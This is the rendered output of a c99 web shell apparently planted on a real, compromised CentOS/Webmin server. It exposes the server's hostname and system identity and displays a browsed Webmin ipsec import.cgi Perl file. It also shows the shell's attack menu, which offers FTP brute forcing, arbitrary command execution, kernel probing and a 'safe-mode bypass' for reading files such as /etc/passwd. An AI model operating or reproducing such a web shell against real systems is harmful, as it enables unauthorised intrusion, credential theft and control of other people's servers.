!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/ipsec/   drwxr-xr-x
Free 51.95 GB of 127.8 GB (40.65%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     import.cgi (1.61 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# import.cgi
# Add an imported connection to the config file

require './ipsec-lib.pl';
&ReadParseMime();
&error_setup($text{'import_err'});

# Get the file
if ($in{'mode'} == 0) {
    $in{'upload'} || &error($text{'import_eupload'});
    $in{'upload'} =~ s/\r//g;
    @data = split(/\n/, $in{'upload'});
    }
else {
    $in{'file'} || &error($text{'import_efile'});
    open(FILE, $in{'file'}) || &error($text{'import_eopen'});
    while(<FILE>) {
        s/\r|\n//g;
        push(@data, $_);
        }
    close(FILE);
    }

# Read and validate it
$temp = &transname();
open(TEMP, ">$temp");
print TEMP map { "$_\n" } @data;
close(TEMP);
@iconf = &get_config($temp);
unlink($temp);
if (@iconf != 1 || $iconf[0]->{'name'} ne 'conn') {
    &error($text{'import_eformat'});
    }
@conf = &get_config();
foreach $c (@conf) {
    if (lc($c->{'value'}) eq lc($iconf[0]->{'value'})) {
        $clash = $c;
        if (!$in{'over'}) {
            &error(&text('import_eclash',
                     "<tt>$iconf[0]->{'value'}</tt>"));
            }
        }
    }

# Add to the real config file
if ($clash) {
    &lock_file($clash->{'file'});
    $lref = &read_file_lines($clash->{'file'});
    splice(@$lref, $clash->{'line'},
           $clash->{'eline'} - $clash->{'line'} + 1, @data);
    }
else {
    &lock_file($config{'file'});
    $lref = &read_file_lines($config{'file'});
    push(@$lref, @data);
    }
&flush_file_lines();
&unlock_all_files();

# Tell the user
&ui_print_header(undef, $text{'import_title'}, "");

print "<p>",&text($clash ? 'import_done2' : 'import_done1',
          "<tt>$iconf[0]->{'value'}</tt>"),"<p>\n";

&ui_print_footer("", $text{'index_return'});

# All done
&webmin_log("import", "conn", $iconf[0]->{'value'}, $iconf[0]->{'values'});


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0097 ]--